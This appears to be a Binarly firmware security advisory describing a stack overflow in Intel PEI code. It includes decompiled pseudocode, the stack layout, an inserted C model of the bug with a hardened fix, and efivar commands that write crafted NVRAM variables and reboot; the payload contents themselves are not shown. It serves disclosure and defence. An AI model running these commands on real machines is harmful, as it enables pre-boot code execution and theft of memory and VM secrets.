A potential attacker can execute arbitrary code during the PEI phase and influence the subsequent boot stages. This can lead to bypassing mitigations, disclosing physical memory contents, recovering secrets from any Virtual Machines (VMs), and bypassing memory isolation and confidential computing boundaries. Additionally, an attacker can build a payload that can be injected into SMRAM.
Binarly REsearch Team has discovered a stack buffer overflow vulnerability on Intel platforms that allows a potential attacker to execute arbitrary code during the PEI phase.
The pseudocode of the vulnerable function is shown below:
int __thiscall sub_FFAE2B82(void *this)
{
    ...
    const EFI_PEI_SERVICES **PeiServices;
    char CpuSetupData[1072];                 // fixed-size stack buffer shared by both calls
    UINTN DataSize;
    EFI_PEI_READ_ONLY_VARIABLE2_PPI *Ppi;
    ...
    DataSize = 1072;                         // set once, never reset between the two calls
    // If SaSetup is larger than 1072 bytes, this call updates DataSize to the real size
    Ppi->GetVariable(Ppi, L"SaSetup", &gSaSetupGuid, 0, &DataSize, CpuSetupData);
    // Reuses the possibly enlarged DataSize against the same 1072-byte buffer
    Ppi->GetVariable(Ppi, L"CpuSetup", &gCpuSetupGuid, 0, &DataSize, CpuSetupData);
    ...
    return 0;
}
If the value of the SaSetup NVRAM variable is larger than 1072 bytes, then after the first call of the Ppi->GetVariable() service, the DataSize value will be overwritten with the real size of the SaSetup NVRAM variable. After the second call of the Ppi->GetVariable() service, a stack overflow may occur. An overflow of 24 bytes is enough to execute arbitrary code:
-00000440 CpuSetupData db 1072 dup(?)
-00000010 var_10 db ?
-0000000F db ? ; undefined
-0000000E var_E dd ?
-0000000A db ? ; undefined
-00000009 db ? ; undefined
-00000008 DataSize dd ?
-00000004 Ppi dd ? ; offset
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
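The DataSize reuse described above, modelled as an added C example (not the page's or the firmware's code): a mock GetVariable that follows the UEFI semantics the advisory relies on (a too-small buffer updates DataSize and copies nothing), the vulnerable call sequence evaluated arithmetically instead of actually writing past the buffer, and the hardened form that re-arms DataSize before every call. The variable store, names and sizes are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
/* Stand-ins for the UEFI types on the page; added model, not firmware code. */
typedef uint32_t EFI_STATUS; typedef size_t UINTN;
#define EFI_SUCCESS          0u
#define EFI_BUFFER_TOO_SMALL 0x80000005u
#define EFI_NOT_FOUND        0x8000000Eu
#define SETUP_BUF_SIZE       1072u   /* sizeof(CpuSetupData) in the decompiled function */

/* Constructed NVRAM store: both variables sized to 1096 bytes (1072 + 24). */
typedef struct { const char *name; UINTN size; } MockVar;
static const MockVar g_store[] = { { "SaSetup", 1096 }, { "CpuSetup", 1096 } };
static const MockVar *lookup(const char *name) {
    for (size_t i = 0; i < sizeof g_store / sizeof g_store[0]; i++)
        if (strcmp(g_store[i].name, name) == 0) return &g_store[i];
    return NULL;
}

/* GetVariable with UEFI-spec semantics: if the buffer is too small, *DataSize
 * is set to the required size and nothing is copied. */
static EFI_STATUS mock_get_variable(const char *name, UINTN *DataSize, void *Data) {
    const MockVar *v = lookup(name);
    if (!v) return EFI_NOT_FOUND;
    if (*DataSize < v->size) { *DataSize = v->size; return EFI_BUFFER_TOO_SMALL; }
    memset(Data, 0xAA, v->size);   /* stand-in for the variable contents */
    *DataSize = v->size;
    return EFI_SUCCESS;
}

/* Models the page's call sequence without performing the out-of-bounds write:
 * returns how many bytes past CpuSetupData the second call would copy. */
size_t unsafe_sequence_overrun(void) {
    UINTN DataSize = SETUP_BUF_SIZE;
    uint8_t buf[SETUP_BUF_SIZE];
    mock_get_variable("SaSetup", &DataSize, buf);   /* too small: DataSize becomes 1096 */
    const MockVar *cpu = lookup("CpuSetup");         /* second call would trust that size */
    if (!cpu || cpu->size > DataSize || cpu->size <= SETUP_BUF_SIZE) return 0;
    return cpu->size - SETUP_BUF_SIZE;
}

/* Hardened pattern: re-arm DataSize before every call and reject anything that
 * does not fit, so an oversized variable can never enlarge the copy. */
EFI_STATUS read_setup_vars_safe(void) {
    uint8_t sa[SETUP_BUF_SIZE], cpu[SETUP_BUF_SIZE];
    UINTN DataSize = SETUP_BUF_SIZE;
    EFI_STATUS st = mock_get_variable("SaSetup", &DataSize, sa);
    if (st != EFI_SUCCESS) return st;
    DataSize = SETUP_BUF_SIZE;   /* reset: the first call may have grown it */
    return mock_get_variable("CpuSetup", &DataSize, cpu);
}
```

With both constructed variables at 1096 bytes, the unsafe sequence would run 24 bytes past the buffer, exactly the distance to the return address in the stack layout above, while the hardened reader stops at the first EFI_BUFFER_TOO_SMALL.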
sudo efivar -w -f SaSetupData_new.bin --name 72c5e28c-7783-43a1-8767-fad73fccafa4-SaSetup
sudo efivar -w -f CpuSetupData_new.bin --name b08f97ff-e6e8-4193-a997-5e9e9b0adb32-CpuSetup
sudo reboot
The data in the file SaSetupData_new.bin may be as follows:
The data in the file CpuSetupData_new.bin may be as follows:
This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
Binarly REsearch Team